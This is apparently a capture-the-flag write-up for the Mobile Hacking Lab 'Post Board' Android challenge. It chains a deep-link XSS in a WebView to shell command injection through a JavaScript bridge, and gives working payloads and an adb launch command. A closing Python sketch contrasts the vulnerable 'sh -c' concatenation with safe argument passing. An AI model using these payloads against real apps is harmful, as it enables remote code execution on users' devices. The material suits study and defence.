Post Board
Hello everyone. In this blog post, I will try to explain my solution steps for the Post Board challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.

After installing the APK and opening it, we see a message application with an input field.
Let's examine the AndroidManifest.xml. We find that the activity `com.mobilehackinglab.postboard.MainActivity` is exported and has a data element with scheme=`postboard` and android:host=`postmessage`, with the category `BROWSABLE`.
Let's analyze the code of this main activity.

The first thing we find is `setupView()`, which calls `setJavaScriptEnabled(true)` and loads the URL `file:///android_asset/index.html`.
The second thing is `handleIntent()`. It verifies that the intent's URI scheme is `postboard` and the host is `postmessage`. It then decodes a Base64-encoded path in the URI, escapes certain characters, and passes it to JavaScript via `WebAppInterface.postMarkdownMessage` to display it on the home page.
Let's test our input.

The first payload is `<h1>kero</h1>` ⇒ success.

The second payload is `<img src=x onerror=alert(1)>` ⇒ success.
When we analyze the `WebAppInterface` class, we find the function `postCowsayMessage()`. It executes the `cowsay` script located at `CowsayUtil.scriptPath`, passing the message argument as `{"bin/sh", "-c", CowsayUtil.scriptPath + ' ' + message}`. It uses a shell and runs the script path concatenated with the message.

Maybe we can call `postCowsayMessage` and pass `whoami` as the `cowsayMessage`. It will then be passed to `runCowsay` and executed.

My payload is:
```
<img src=x onerror=WebAppInterface.postCowsayMessage("Kero0x1_is_here;id")>
```

Let's Base64-encode it and send it with adb:

```
adb shell am start -n "com.mobilehackinglab.postboard/.MainActivity" -a "android.intent.action.VIEW" -d "postboard://postmessage/PGltZyBzcmM9eCBvbmVycm9yPVdlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgiS2VybzB4MV9pc19oZXJlO2lkIik+"
```
And here we succeed and get RCE 😉
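
The root cause in `postCowsayMessage` is the `sh -c` string built from the script path plus the message. The following Python sketch is an added example, not code from the app or from the original write-up: it reproduces that argv shape next to a hardened call that passes the message as a single argument. `/bin/echo` standing in for the cowsay script, the function names and the sample messages are assumptions constructed for illustration.

```python
import subprocess

# Assumption: /bin/echo stands in for the script at CowsayUtil.scriptPath.
SCRIPT = "/bin/echo"

# Constructed sample messages; the marker command is a harmless echo.
SAMPLES = ["moo", "moo; echo MARK", "moo $(echo MARK)", "moo && echo MARK"]


def run_concatenated(message):
    """Same argv shape as on the page: sh -c parses script + ' ' + message."""
    argv = ["/bin/sh", "-c", SCRIPT + " " + message]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def run_as_argument(message):
    """Hardened: no shell involved, the message is exactly one argv entry."""
    argv = [SCRIPT, message]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def compare(samples=SAMPLES):
    """Return {message: (shell_changed_it, hardened_output)} per sample."""
    report = {}
    for msg in samples:
        literal = msg + "\n"  # what the script prints if the text stays data
        report[msg] = (run_concatenated(msg) != literal, run_as_argument(msg))
    return report


if __name__ == "__main__":
    for msg, (changed, safe_out) in compare().items():
        print(f"{msg!r}: shell altered output={changed}, hardened={safe_out!r}")
```

In the app the equivalent fix is to execute the script with the message as its own array element instead of going through `sh -c`, so shell metacharacters in the message stay plain text.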